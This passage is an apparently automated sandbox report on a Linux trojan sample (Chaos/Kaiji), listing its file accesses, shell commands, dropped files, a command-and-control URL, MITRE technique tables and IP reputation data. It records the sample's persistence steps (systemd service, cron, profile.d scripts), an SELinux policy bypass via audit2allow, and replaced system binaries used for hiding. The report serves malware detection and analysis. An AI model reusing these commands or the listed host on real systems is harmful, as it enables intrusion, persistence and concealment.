    Source: /tmp/linux_386.elf (PID: 6245)File opened: /proc/1582/statJump to behavior
    Source: /tmp/linux_386.elf (PID: 6245)File opened: /proc/1582/statJump to behavior
    Source: /tmp/linux_386.elf (PID: 6245)File opened: /proc/1582/statJump to behavior
    Source: /tmp/linux_386.elf (PID: 6245)File opened: /proc/1582/statJump to behavior
    Source: /tmp/linux_386.elf (PID: 6245)File opened: /proc/1582/statJump to behavior
    Source: /tmp/linux_386.elf (PID: 6245)File opened: /proc/1582/statJump to behavior
    Source: /tmp/linux_386.elf (PID: 6245)File opened: /proc/1582/statJump to behavior
    Source: /tmp/linux_386.elf (PID: 6245)File opened: /proc/1582/statJump to behavior
    Source: /tmp/linux_386.elf (PID: 6245)File opened: /proc/1582/statJump to behavior
    Source: /tmp/linux_386.elf (PID: 6245)File opened: /proc/1582/statJump to behavior
    Source: /tmp/linux_386.elf (PID: 6245)File opened: /proc/1582/statJump to behavior
    Source: /tmp/linux_386.elf (PID: 6245)File opened: /proc/1582/statJump to behavior
    Source: /tmp/linux_386.elf (PID: 6245)File opened: /proc/1582/statJump to behavior
    Source: /tmp/linux_386.elf (PID: 6245)File opened: /proc/1582/statJump to behavior
    Source: /tmp/linux_386.elf (PID: 6245)File opened: /proc/1582/statJump to behavior
    Source: /tmp/linux_386.elf (PID: 6245)File opened: /proc/1582/statJump to behavior
    Source: /tmp/linux_386.elf (PID: 6245)File opened: /proc/1582/statJump to behavior
    Source: /tmp/linux_386.elf (PID: 6245)File opened: /proc/1582/statJump to behavior
    Source: /tmp/linux_386.elf (PID: 6245)File opened: /proc/1582/statJump to behavior
    Source: /tmp/linux_386.elf (PID: 6245)File opened: /proc/1582/statJump to behavior
    Source: /tmp/linux_386.elf (PID: 6245)File opened: /proc/1582/statJump to behavior
    Source: /tmp/linux_386.elf (PID: 6245)File opened: /proc/1582/statJump to behavior
    Source: /tmp/linux_386.elf (PID: 6245)File opened: /proc/1582/statJump to behavior
    Source: /tmp/linux_386.elf (PID: 6245)File opened: /proc/1582/statJump to behavior
    Source: /tmp/linux_386.elf (PID: 6245)File opened: /proc/1582/statJump to behavior
    Source: /tmp/linux_386.elf (PID: 6245)File opened: /proc/1582/statJump to behavior
    Source: /tmp/linux_386.elf (PID: 6245)File opened: /proc/1582/statJump to behavior
    Source: /tmp/linux_386.elf (PID: 6245)File opened: /proc/1582/statJump to behavior
    Source: /tmp/linux_386.elf (PID: 6245)File opened: /proc/1582/statJump to behavior
    Source: /tmp/linux_386.elf (PID: 6245)File opened: /proc/1582/statJump to behavior
    Source: /tmp/linux_386.elf (PID: 6245)File opened: /proc/1582/statJump to behavior
    Source: /tmp/linux_386.elf (PID: 6245)File opened: /proc/1582/statJump to behavior
    Source: /tmp/linux_386.elf (PID: 6245)File opened: /proc/1582/statJump to behavior
    Source: /tmp/linux_386.elf (PID: 6245)File opened: /proc/1582/statJump to behavior
    Source: /tmp/linux_386.elf (PID: 6245)File opened: /proc/1582/statJump to behavior
    Source: /tmp/linux_386.elf (PID: 6245)File opened: /proc/1582/statJump to behavior
    Source: /tmp/linux_386.elf (PID: 6245)File opened: /proc/1582/statJump to behavior
    Source: /tmp/linux_386.elf (PID: 6245)File opened: /proc/1582/statJump to behavior
    Source: /tmp/linux_386.elf (PID: 6245)File opened: /proc/1582/statJump to behavior
    Source: /tmp/linux_386.elf (PID: 6245)File opened: /proc/1582/statJump to behavior
    Source: /tmp/linux_386.elf (PID: 6245)File opened: /proc/1582/statJump to behavior
    Source: /tmp/linux_386.elf (PID: 6245)File opened: /proc/1582/statJump to behavior
    Source: /tmp/linux_386.elf (PID: 6245)File opened: /proc/1582/statJump to behavior
    Source: /tmp/linux_386.elf (PID: 6245)File opened: /proc/1582/statJump to behavior
    Source: /tmp/linux_386.elf (PID: 6245)File opened: /proc/3088/statJump to behavior
    Source: /tmp/linux_386.elf (PID: 6245)File opened: /proc/3088/statJump to behavior
    Source: /tmp/linux_386.elf (PID: 6245)File opened: /proc/3088/statJump to behavior
    Source: /tmp/linux_386.elf (PID: 6245)File opened: /proc/3088/statJump to behavior
    Source: /tmp/linux_386.elf (PID: 6245)File opened: /proc/3088/statJump to behavior
    Source: /tmp/linux_386.elf (PID: 6245)File opened: /proc/3088/statJump to behavior
    Source: /tmp/linux_386.elf (PID: 6245)File opened: /proc/3088/statJump to behavior
    Source: /tmp/linux_386.elf (PID: 6245)File opened: /proc/3088/statJump to behavior
    Source: /tmp/linux_386.elf (PID: 6245)File opened: /proc/3088/statJump to behavior
    Source: /tmp/linux_386.elf (PID: 6245)File opened: /proc/3088/statJump to behavior
    Source: /tmp/linux_386.elf (PID: 6245)File opened: /proc/3088/statJump to behavior
    Source: /tmp/linux_386.elf (PID: 6245)File opened: /proc/3088/statJump to behavior
    Source: /tmp/linux_386.elf (PID: 6245)File opened: /proc/3088/statJump to behavior
    Source: /tmp/linux_386.elf (PID: 6245)File opened: /proc/3088/statJump to behavior
    Source: /tmp/linux_386.elf (PID: 6245)File opened: /proc/3088/statJump to behavior
    Source: /tmp/linux_386.elf (PID: 6245)File opened: /proc/3088/statJump to behavior
    Source: /tmp/linux_386.elf (PID: 6245)File opened: /proc/3088/statJump to behavior
    Source: /tmp/linux_386.elf (PID: 6245)File opened: /proc/3088/statJump to behavior
    Source: /tmp/linux_386.elf (PID: 6245)File opened: /proc/3088/statJump to behavior
    Source: /tmp/linux_386.elf (PID: 6245)File opened: /proc/3088/statJump to behavior
    Source: /tmp/linux_386.elf (PID: 6245)File opened: /proc/3088/statJump to behavior
    Source: /tmp/linux_386.elf (PID: 6245)File opened: /proc/3088/statJump to behavior
    Source: /tmp/linux_386.elf (PID: 6245)File opened: /proc/3088/statJump to behavior
    Source: /tmp/linux_386.elf (PID: 6245)File opened: /proc/3088/statJump to behavior
    Source: /tmp/linux_386.elf (PID: 6245)File opened: /proc/3088/statJump to behavior
    Source: /tmp/linux_386.elf (PID: 6245)File opened: /proc/3088/statJump to behavior
    Source: /tmp/linux_386.elf (PID: 6245)File opened: /proc/3088/statJump to behavior
    Source: /tmp/linux_386.elf (PID: 6245)File opened: /proc/3088/statJump to behavior
    Source: /tmp/linux_386.elf (PID: 6245)File opened: /proc/3088/statJump to behavior
    Source: /tmp/linux_386.elf (PID: 6245)File opened: /proc/3088/statJump to behavior
    Source: /tmp/linux_386.elf (PID: 6245)File opened: /proc/3088/statJump to behavior
    Source: /tmp/linux_386.elf (PID: 6245)File opened: /proc/3088/statJump to behavior
    Source: /tmp/linux_386.elf (PID: 6245)File opened: /proc/3088/statJump to behavior
    Source: /tmp/linux_386.elf (PID: 6245)File opened: /proc/3088/statJump to behavior
    Source: /tmp/linux_386.elf (PID: 6245)File opened: /proc/3088/statJump to behavior
    Source: /tmp/linux_386.elf (PID: 6245)File opened: /proc/3088/statJump to behavior
    Source: /tmp/linux_386.elf (PID: 6245)File opened: /proc/3088/statJump to behavior
    Source: /tmp/linux_386.elf (PID: 6245)File opened: /proc/3088/statJump to behavior
    Source: /tmp/linux_386.elf (PID: 6245)File opened: /proc/3088/statJump to behavior
    Source: /tmp/linux_386.elf (PID: 6245)File opened: /proc/3088/statJump to behavior
    Source: /tmp/linux_386.elf (PID: 6245)File opened: /proc/3088/statJump to behavior
    Source: /tmp/linux_386.elf (PID: 6245)File opened: /proc/3088/statJump to behavior
    Source: /tmp/linux_386.elf (PID: 6245)File opened: /proc/3088/statJump to behavior
    Source: /tmp/linux_386.elf (PID: 6245)File opened: /proc/3088/statJump to behavior
    Source: /tmp/linux_386.elf (PID: 6245)File opened: /proc/3088/statJump to behavior
    Source: /tmp/linux_386.elf (PID: 6245)File opened: /proc/3088/statJump to behavior
    Source: /tmp/linux_386.elf (PID: 6245)File opened: /proc/3088/statJump to behavior
    Source: /tmp/linux_386.elf (PID: 6245)File opened: /proc/3088/statJump to behavior
    Source: /tmp/linux_386.elf (PID: 6245)File opened: /proc/3088/statJump to behavior
    Source: /tmp/linux_386.elf (PID: 6245)File opened: /proc/3088/statJump to behavior
    Source: /tmp/linux_386.elf (PID: 6245)File opened: /proc/3088/statJump to behavior
    Source: /tmp/linux_386.elf (PID: 6245)File opened: /proc/3088/statJump to behavior
    Source: /tmp/linux_386.elf (PID: 6245)File opened: /proc/3088/statJump to behavior
    Source: /tmp/linux_386.elf (PID: 6245)File opened: /proc/3088/statJump to behavior
    Source: /tmp/linux_386.elf (PID: 6245)File opened: /proc/3088/statJump to behavior
    Source: /tmp/linux_386.elf (PID: 6245)File opened: /proc/3088/statJump to behavior
    Source: /tmp/linux_386.elf (PID: 6245)File opened: /proc/3088/statJump to behavior
    Source: /tmp/linux_386.elf (PID: 6245)File opened: /proc/3088/statJump to behavior
    Source: /tmp/linux_386.elf (PID: 6245)File opened: /proc/3088/statJump to behavior
    Source: /tmp/linux_386.elf (PID: 6245)File opened: /proc/3088/statJump to behavior
    Source: /tmp/linux_386.elf (PID: 6245)File opened: /proc/3088/statJump to behavior
    Source: /tmp/linux_386.elf (PID: 6245)File opened: /proc/3088/statJump to behavior
    Source: /tmp/linux_386.elf (PID: 6245)File opened: /proc/3088/statJump to behavior
    Source: /tmp/linux_386.elf (PID: 6245)File opened: /proc/3088/statJump to behavior
    Source: /tmp/linux_386.elf (PID: 6245)File opened: /proc/3088/statJump to behavior
    Source: /tmp/linux_386.elf (PID: 6245)File opened: /proc/3088/statJump to behavior
    Source: /tmp/linux_386.elf (PID: 6245)File opened: /proc/3088/statJump to behavior
    Source: /tmp/linux_386.elf (PID: 6245)File opened: /proc/3088/statJump to behavior
    Source: /tmp/linux_386.elf (PID: 6245)File opened: /proc/3088/statJump to behavior
    Source: /tmp/linux_386.elf (PID: 6245)File opened: /proc/3088/statJump to behavior
    Source: /tmp/linux_386.elf (PID: 6245)File opened: /proc/3088/statJump to behavior
    Source: /tmp/linux_386.elf (PID: 6245)File opened: /proc/3088/statJump to behavior
    Source: /tmp/linux_386.elf (PID: 6245)File opened: /proc/3088/statJump to behavior
    Source: /tmp/linux_386.elf (PID: 6245)File opened: /proc/3088/statJump to behavior
    Source: /tmp/linux_386.elf (PID: 6245)File opened: /proc/3088/statJump to behavior
    Source: /tmp/linux_386.elf (PID: 6245)File opened: /proc/3088/statJump to behavior
    Source: /tmp/linux_386.elf (PID: 6245)File opened: /proc/3088/statJump to behavior
    Source: /tmp/linux_386.elf (PID: 6243)Shell command executed: /bin/bash -c /etc/32678&Jump to behavior
    Source: /tmp/linux_386.elf (PID: 6284)Shell command executed: /bin/bash -c "cd /boot;systemctl daemon-reload;systemctl enable linux.service;systemctl start linux.service;journalctl -xe --no-pager"
    Source: /tmp/linux_386.elf (PID: 6373)Shell command executed: /bin/bash -c "cd /boot;ausearch -c 'System.img.conf' --raw | audit2allow -M my-Systemimgconf;semodule -X 300 -i my-Systemimgconf.pp"
    Source: /usr/sbin/cron (PID: 6674)Shell command executed: /bin/sh -c "/.img "
    Source: /usr/sbin/cron (PID: 6681)Shell command executed: /bin/sh -c " [ -x /usr/lib/php/sessionclean ] && if [ ! -d /run/systemd/system ]; then /usr/lib/php/sessionclean; fi"
    Source: /boot/System.img.config (PID: 6317)Pkill executable: /usr/bin/pkill -> pkill -9 32678
    Source: /etc/id.services.conf (PID: 6714)Pkill executable: /usr/bin/pkill -> pkill -9 32678
    Source: /usr/sbin/service (PID: 6244)Systemctl executable: /usr/bin/systemctl -> systemctl start crond.serviceJump to behavior
    Source: /usr/sbin/service (PID: 6264)Systemctl executable: /usr/bin/systemctl -> systemctl --quiet is-active multi-user.targetJump to behavior
    Source: /usr/sbin/service (PID: 6267)Systemctl executable: /usr/bin/systemctl -> systemctl list-unit-files --full --type=socketJump to behavior
    Source: /usr/sbin/update-rc.d (PID: 6265)Systemctl executable: /usr/bin/systemctl -> systemctl daemon-reload
    Source: /bin/bash (PID: 6285)Systemctl executable: /usr/bin/systemctl -> systemctl daemon-reload
    Source: /bin/bash (PID: 6299)Systemctl executable: /usr/bin/systemctl -> systemctl enable linux.service
    Source: /bin/bash (PID: 6303)Systemctl executable: /usr/bin/systemctl -> systemctl start linux.service
    Source: /usr/sbin/service (PID: 6466)Systemctl executable: /usr/bin/systemctl -> systemctl start cron.service
    Source: /usr/sbin/service (PID: 6469)Systemctl executable: /usr/bin/systemctl -> systemctl --quiet is-active multi-user.target
    Source: /usr/sbin/service (PID: 6512)Systemctl executable: /usr/bin/systemctl -> systemctl list-unit-files --full --type=socket
    Source: /tmp/linux_386.elf (PID: 6592)Systemctl executable: /usr/bin/systemctl -> systemctl start crond.service
    Source: /usr/sbin/service (PID: 6716)Systemctl executable: /usr/bin/systemctl -> systemctl start crond.service
    Source: /usr/sbin/service (PID: 6729)Systemctl executable: /usr/bin/systemctl -> systemctl --quiet is-active multi-user.target
    Source: /usr/sbin/service (PID: 6731)Systemctl executable: /usr/bin/systemctl -> systemctl list-unit-files --full --type=socket
    Source: /usr/sbin/service (PID: 6347)Systemctl executable: /usr/bin/systemctl -> systemctl start crond.service
    Source: /usr/sbin/service (PID: 6364)Systemctl executable: /usr/bin/systemctl -> systemctl --quiet is-active multi-user.target
    Source: /usr/sbin/service (PID: 6366)Systemctl executable: /usr/bin/systemctl -> systemctl list-unit-files --full --type=socket
    Source: /tmp/linux_386.elf (PID: 6238)File: /etc/id.services.conf (bits: - usr: rx grp: rx all: rwx)Jump to behavior
    Source: /tmp/linux_386.elf (PID: 6238)File: /etc/32678 (bits: - usr: rx grp: rx all: rwx)Jump to behavior
    Source: /tmp/linux_386.elf (PID: 6245)File: /boot/System.img.config (bits: - usr: rx grp: rx all: rwx)Jump to behavior
    Source: /tmp/linux_386.elf (PID: 6245)File: /etc/profile.d/bash_config (bits: - usr: rx grp: rx all: rwx)Jump to behavior
    Source: /tmp/linux_386.elf (PID: 6245)File: /usr/lib/libdlrpcld.so (bits: - usr: rx grp: rx all: rwx)Jump to behavior
    Source: /tmp/linux_386.elf (PID: 6245)File: /usr/lib/system-monitor (bits: - usr: rx grp: rx all: rwx)Jump to behavior
    Source: /tmp/linux_386.elf (PID: 6245)File: /usr/bin/ps (bits: - usr: rx grp: rx all: rwx)Jump to behavior
    Source: /tmp/linux_386.elf (PID: 6245)File: /usr/bin/ss (bits: - usr: rx grp: rx all: rwx)Jump to behavior
    Source: /tmp/linux_386.elf (PID: 6245)File: /usr/bin/ls (bits: - usr: rx grp: rx all: rwx)Jump to behavior
    Source: /tmp/linux_386.elf (PID: 6245)File: /usr/bin/dir (bits: - usr: rx grp: rx all: rwx)Jump to behavior
    Source: /tmp/linux_386.elf (PID: 6245)File: /usr/bin/netstat (bits: - usr: rx grp: rx all: rwx)Jump to behavior
    Source: /tmp/linux_386.elf (PID: 6245)File: /usr/bin/find (bits: - usr: rx grp: rx all: rwx)Jump to behavior
    Source: /tmp/linux_386.elf (PID: 6245)File: /usr/bin/lsof (bits: - usr: rx grp: rx all: rwx)Jump to behavior
    Source: /tmp/linux_386.elf (PID: 6238)Writes shell script file to disk with an unusual file extension: /etc/32678Jump to dropped file
    Source: /tmp/linux_386.elf (PID: 6245)Writes shell script file to disk with an unusual file extension: /etc/init.d/linux_killJump to dropped file
    Source: /tmp/linux_386.elf (PID: 6245)Writes shell script file to disk with an unusual file extension: /.imgJump to dropped file
    Source: /tmp/linux_386.elf (PID: 6245)Writes shell script file to disk with an unusual file extension: /etc/init.d/sshJump to dropped file
    Source: /tmp/linux_386.elf (PID: 6245)Shell script file created: /etc/profile.d/bash_config.shJump to dropped file
    Source: /usr/sbin/service (PID: 6268)Sed executable: /usr/bin/sed -> sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/pJump to behavior
    Source: /usr/sbin/service (PID: 6513)Sed executable: /usr/bin/sed -> sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/p
    Source: /usr/sbin/service (PID: 6732)Sed executable: /usr/bin/sed -> sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/p
    Source: /usr/sbin/service (PID: 6367)Sed executable: /usr/bin/sed -> sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/p

    Hooking and other Techniques for Hiding and Protection

    barindex
    Source: /tmp/linux_386.elf (PID: 6245)File: /etc/init.d/linux_killJump to dropped file
    Source: /tmp/linux_386.elf (PID: 6245)File: /etc/init.d/sshJump to dropped file
    Source: unknownNetwork traffic detected: HTTP traffic on port 808 -> 53978
    Source: unknownNetwork traffic detected: HTTP traffic on port 53982 -> 808
    Source: unknownNetwork traffic detected: HTTP traffic on port 808 -> 53982
    Source: /etc/32678 (PID: 6263)Sleep executable: /usr/bin/sleep -> sleep 60Jump to behavior
    Source: /etc/32678 (PID: 6362)Sleep executable: /usr/bin/sleep -> sleep 60
    Source: /etc/32678 (PID: 6727)Sleep executable: /usr/bin/sleep -> sleep 60
    Source: /usr/bin/pkill (PID: 6317)Reads CPU info from /sys: /sys/devices/system/cpu/online
    Source: /usr/bin/pkill (PID: 6714)Reads CPU info from /sys: /sys/devices/system/cpu/online
    Source: /usr/bin/sleep (PID: 6263)Sleeps longer then 60s: 60.0sJump to behavior
    Source: /usr/bin/sleep (PID: 6362)Sleeps longer then 60s: 60.0s
    Source: /usr/bin/sleep (PID: 6727)Sleeps longer then 60s: 60.0s
    Source: /usr/sbin/cron (PID: 6582)Sleeps longer then 60s: 60.0s
    Source: /tmp/linux_386.elf (PID: 6238)Queries kernel information via 'uname': Jump to behavior
    Source: /bin/bash (PID: 6243)Queries kernel information via 'uname': Jump to behavior
    Source: /tmp/linux_386.elf (PID: 6245)Queries kernel information via 'uname': Jump to behavior
    Source: /bin/bash (PID: 6284)Queries kernel information via 'uname':
    Source: /bin/bash (PID: 6373)Queries kernel information via 'uname':
    Source: /usr/bin/bash (PID: 6399)Queries kernel information via 'uname':

    Stealing of Sensitive Information

    barindex
    Source: Yara matchFile source: linux_386.elf, type: SAMPLE

    Remote Access Functionality

    barindex
    Source: Yara matchFile source: linux_386.elf, type: SAMPLE
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity Information2
    Scripting
    Valid Accounts1
    Command and Scripting Interpreter
    1
    Unix Shell Configuration Modification
    1
    Unix Shell Configuration Modification
    1
    Masquerading
    1
    OS Credential Dumping
    1
    Security Software Discovery
    Remote ServicesData from Local System1
    Encrypted Channel
    Exfiltration Over Other Network Medium1
    Data Manipulation
    CredentialsDomainsDefault AccountsScheduled Task/Job1
    Systemd Service
    1
    Systemd Service
    1
    Hide Artifacts
    LSASS Memory1
    Virtualization/Sandbox Evasion
    Remote Desktop ProtocolData from Removable Media11
    Non-Standard Port
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAt2
    Scripting
    Logon Script (Windows)1
    Virtualization/Sandbox Evasion
    Security Account Manager1
    File and Directory Discovery
    SMB/Windows Admin SharesData from Network Shared Drive1
    Ingress Tool Transfer
    Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
    File and Directory Permissions Modification
    NTDS1
    System Information Discovery
    Distributed Component Object ModelInput Capture2
    Non-Application Layer Protocol
    Traffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
    Disable or Modify Tools
    LSA SecretsInternet Connection DiscoverySSHKeylogging3
    Application Layer Protocol
    Scheduled TransferData Encrypted for Impact
    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
    Hidden Files and Directories
    Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
    No configs have been found
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Number of created Files
    • Is malicious
    • Internet
    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1543426 Sample: linux_386.elf Startdate: 27/10/2024 Architecture: LINUX Score: 80 120 109.202.202.202, 80 INIT7CH Switzerland 2->120 122 154.12.82.11, 52106, 53978, 53982 COGENT-174US United States 2->122 124 3 other IPs or domains 2->124 126 Multi AV Scanner detection for submitted file 2->126 128 Yara detected Chaos 2->128 130 Machine Learning detection for sample 2->130 132 Uses known network protocols on non-standard ports 2->132 12 linux_386.elf 2->12         started        16 systemd System.img.config 2->16         started        18 systemd cron 2->18         started        20 8 other processes 2->20 signatures3 process4 file5 118 /etc/32678, POSIX 12->118 dropped 142 Sample tries to set files in /etc globally writable 12->142 22 linux_386.elf linux_386.elf 12->22         started        26 linux_386.elf service systemctl 12->26         started        28 linux_386.elf bash 12->28         started        30 System.img.config sh 16->30         started        32 System.img.config service systemctl 16->32         started        38 2 other processes 16->38 34 cron 18->34         started        36 cron 18->36         started        40 2 other processes 20->40 signatures6 process7 file8 108 /etc/profile.d/bash_config.sh, a 22->108 dropped 110 /etc/init.d/ssh, POSIX 22->110 dropped 112 /etc/init.d/linux_kill, POSIX 22->112 dropped 114 /.img, a 22->114 dropped 134 Sample tries to set files in /etc globally writable 22->134 136 Sample tries to persist itself using /etc/profile 22->136 138 Drops files in suspicious directories 22->138 42 linux_386.elf bash 22->42         started        46 linux_386.elf service systemctl 22->46         started        56 6 other processes 22->56 58 4 other processes 26->58 48 bash 32678 28->48         started        50 sh 32678 30->50         started        60 4 other processes 32->60 52 cron sh 34->52         started        54 cron sh 36->54         started        signatures9 process10 file11 116 /etc/crontab, ASCII 42->116 dropped 140 Sample tries to persist itself using cron 42->140 62 service 46->62         started        72 3 other processes 46->72 64 32678 sleep 48->64         started        66 32678 id.services.conf 50->66         started        68 32678 sleep 50->68         started        70 sh 52->70         started        74 8 other processes 56->74 76 2 other processes 58->76 78 2 other processes 60->78 signatures12 process13 process14 80 service systemctl 62->80         started        82 service sed 62->82         started        84 id.services.conf service systemctl 66->84         started        86 id.services.conf sh 66->86         started        88 id.services.conf pkill 66->88         started        90 id.services.conf id.services.conf 66->90         started        process15 92 service 84->92         started        94 service basename 84->94         started        96 service basename 84->96         started        98 service systemctl 84->98         started        100 sh 32678 86->100         started        process16 102 service systemctl 92->102         started        104 service sed 92->104         started        106 32678 sleep 100->106         started       
    SourceDetectionScannerLabelLink
    linux_386.elf55%ReversingLabsLinux.Trojan.Kaiji
    linux_386.elf100%Joe Sandbox ML
    SourceDetectionScannerLabelLink
    /.img0%ReversingLabs
    /etc/326780%ReversingLabs
    /etc/init.d/linux_kill0%ReversingLabs
    /etc/init.d/ssh0%ReversingLabs
    /etc/profile.d/bash_config.sh0%ReversingLabs
    No Antivirus matches
    No Antivirus matches
    NameIPActiveMaliciousAntivirus DetectionReputation
    www.google.com
    142.250.184.228
    truefalse
      unknown
      NameMaliciousAntivirus DetectionReputation
      http://154.12.82.11:808/password.txtfalse
        unknown
        NameSourceMaliciousAntivirus DetectionReputation
        http://www.baidu.com/search/spider.html)linux_386.elffalse
          unknown
          http://search.msn.com/msnbot.htmlinux_386.elffalse
            unknown
            http://www.baidu.com/search/spider.html)000102030405060708091011121314151617181920212223242526272829linux_386.elffalse
              unknown
              https://www.so.com/s?q=indexlinux_386.elffalse
                unknown
                http://help.yahoo.com/help/us/ysearch/slurp)x509:linux_386.elffalse
                  unknown
                  http://www.google.com/mobile/adsbot.html)linux_386.elffalse
                    unknown
                    http://www.huaweisymantec.com/cn/IRL/spider)Mozilla/5.0linux_386.elffalse
                      unknown
                      http://www.baidu.com/search/spider.html)http2:linux_386.elffalse
                        unknown
                        http://yandex.com/bots)http:linux_386.elffalse
                          unknown
                          http://www.baidu.com/search/spider.html)Mozilla/5.0linux_386.elffalse
                            unknown
                            http://www.entireweb.com/about/search_tech/speedy_spider/)text/htmllinux_386.elffalse
                              unknown
                              http://www.haosou.com/help/help_3_2.htmlMozilla/5.0linux_386.elffalse
                                unknown
                                https://www.baidu.com/s?wd=insufficientlinux_386.elffalse
                                  unknown
                                  http://www.youdao.com/help/webmaster/spider/;)reflect:linux_386.elffalse
                                    unknown
                                    https://search.yahoo.com/search?p=illegallinux_386.elffalse
                                      unknown
                                      • No. of IPs < 25%
                                      • 25% < No. of IPs < 50%
                                      • 50% < No. of IPs < 75%
                                      • 75% < No. of IPs
                                      IPDomainCountryFlagASNASN NameMalicious
                                      154.12.82.11
                                      unknownUnited States
                                      174COGENT-174USfalse
                                      109.202.202.202
                                      unknownSwitzerland
                                      13030INIT7CHfalse
                                      91.189.91.43
                                      unknownUnited Kingdom
                                      41231CANONICAL-ASGBfalse
                                      91.189.91.42
                                      unknownUnited Kingdom
                                      41231CANONICAL-ASGBfalse
                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      154.12.82.11linux_amd64.elfGet hashmaliciousChaosBrowse
                                      • 154.12.82.11:808/password.txt
                                      na.elfGet hashmaliciousChaosBrowse
                                      • 154.12.82.11:808/password.txt
                                      na.elfGet hashmaliciousChaosBrowse
                                      • 154.12.82.11:808/password.txt
                                      na.elfGet hashmaliciousChaosBrowse
                                      • 154.12.82.11:808/password.txt
                                      na.elfGet hashmaliciousChaosBrowse
                                      • 154.12.82.11:808/password.txt
                                      na.elfGet hashmaliciousChaosBrowse
                                      • 154.12.82.11:808/password.txt
                                      na.elfGet hashmaliciousChaosBrowse
                                      • 154.12.82.11:808/password.txt
                                      na.elfGet hashmaliciousChaosBrowse
                                      • 154.12.82.11:808/password.txt
                                      na.elfGet hashmaliciousChaosBrowse
                                      • 154.12.82.11:808/password.txt
                                      109.202.202.202kpLwzBouH4.elfGet hashmaliciousUnknownBrowse
                                      • ch.archive.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_92.0%2bbuild3-0ubuntu0.20.04.1_amd64.deb
                                      91.189.91.43.i.elfGet hashmaliciousUnknownBrowse
                                        na.elfGet hashmaliciousUnknownBrowse
                                          parm6.elfGet hashmaliciousUnknownBrowse
                                            debug.dbg.elfGet hashmaliciousMiraiBrowse
                                              na.elfGet hashmaliciousUnknownBrowse
                                                arm5.elfGet hashmaliciousUnknownBrowse
                                                  linux_amd64.elfGet hashmaliciousChaosBrowse
                                                    linux_mips_softfloat.elfGet hashmaliciousChaosBrowse
                                                      linux_mips64_softfloat.elfGet hashmaliciousChaosBrowse
                                                        tftp.elfGet hashmaliciousUnknownBrowse
                                                          91.189.91.42amd64.elfGet hashmaliciousUnknownBrowse
                                                            .i.elfGet hashmaliciousUnknownBrowse
                                                              na.elfGet hashmaliciousUnknownBrowse
                                                                parm6.elfGet hashmaliciousUnknownBrowse
                                                                  debug.dbg.elfGet hashmaliciousMiraiBrowse
                                                                    na.elfGet hashmaliciousUnknownBrowse
                                                                      arm5.elfGet hashmaliciousUnknownBrowse
                                                                        linux_amd64.elfGet hashmaliciousChaosBrowse
                                                                          linux_mips_softfloat.elfGet hashmaliciousChaosBrowse
                                                                            linux_mips64_softfloat.elfGet hashmaliciousChaosBrowse
                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              www.google.comlinux_amd64.elfGet hashmaliciousChaosBrowse
                                                                              • 142.250.184.196
                                                                              CQlUZ4KuAa.exeGet hashmaliciousVidarBrowse
                                                                              • 142.250.186.100
                                                                              file.exeGet hashmaliciousStealc, VidarBrowse
                                                                              • 216.58.206.68
                                                                              SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exeGet hashmaliciousLummaCBrowse
                                                                              • 142.251.40.100
                                                                              2QPrBtk3J8.exeGet hashmaliciousUnknownBrowse
                                                                              • 142.250.185.228
                                                                              v9dVG4fAGa.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                                              • 142.250.184.196
                                                                              LkCinYWgNh.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                                              • 172.217.16.196
                                                                              R40XD2LfcZ.exeGet hashmaliciousClipboard HijackerBrowse
                                                                              • 172.217.18.4
                                                                              v9dVG4fAGa.exeGet hashmaliciousClipboard HijackerBrowse
                                                                              • 142.250.185.196
                                                                              UfRKIdsNvD.exeGet hashmaliciousClipboard HijackerBrowse
                                                                              • 142.250.185.100
                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              CANONICAL-ASGBamd64.elfGet hashmaliciousUnknownBrowse
                                                                              • 91.189.91.42
                                                                              .i.elfGet hashmaliciousUnknownBrowse
                                                                              • 91.189.91.42
                                                                              na.elfGet hashmaliciousUnknownBrowse
                                                                              • 91.189.91.42
                                                                              parm6.elfGet hashmaliciousUnknownBrowse
                                                                              • 91.189.91.42
                                                                              debug.dbg.elfGet hashmaliciousMiraiBrowse
                                                                              • 91.189.91.42
                                                                              na.elfGet hashmaliciousUnknownBrowse
                                                                              • 91.189.91.42
                                                                              arm5.elfGet hashmaliciousUnknownBrowse
                                                                              • 91.189.91.42
                                                                              linux_amd64.elfGet hashmaliciousChaosBrowse
                                                                              • 91.189.91.42
                                                                              linux_mips_softfloat.elfGet hashmaliciousChaosBrowse
                                                                              • 91.189.91.42
                                                                              linux_mips64_softfloat.elfGet hashmaliciousChaosBrowse
                                                                              • 91.189.91.42
                                                                              CANONICAL-ASGBamd64.elfGet hashmaliciousUnknownBrowse
                                                                              • 91.189.91.42
                                                                              .i.elfGet hashmaliciousUnknownBrowse
                                                                              • 91.189.91.42
                                                                              na.elfGet hashmaliciousUnknownBrowse
                                                                              • 91.189.91.42
                                                                              parm6.elfGet hashmaliciousUnknownBrowse
                                                                              • 91.189.91.42
                                                                              debug.dbg.elfGet hashmaliciousMiraiBrowse
                                                                              • 91.189.91.42
                                                                              na.elfGet hashmaliciousUnknownBrowse
                                                                              • 91.189.91.42
                                                                              arm5.elfGet hashmaliciousUnknownBrowse
                                                                              • 91.189.91.42
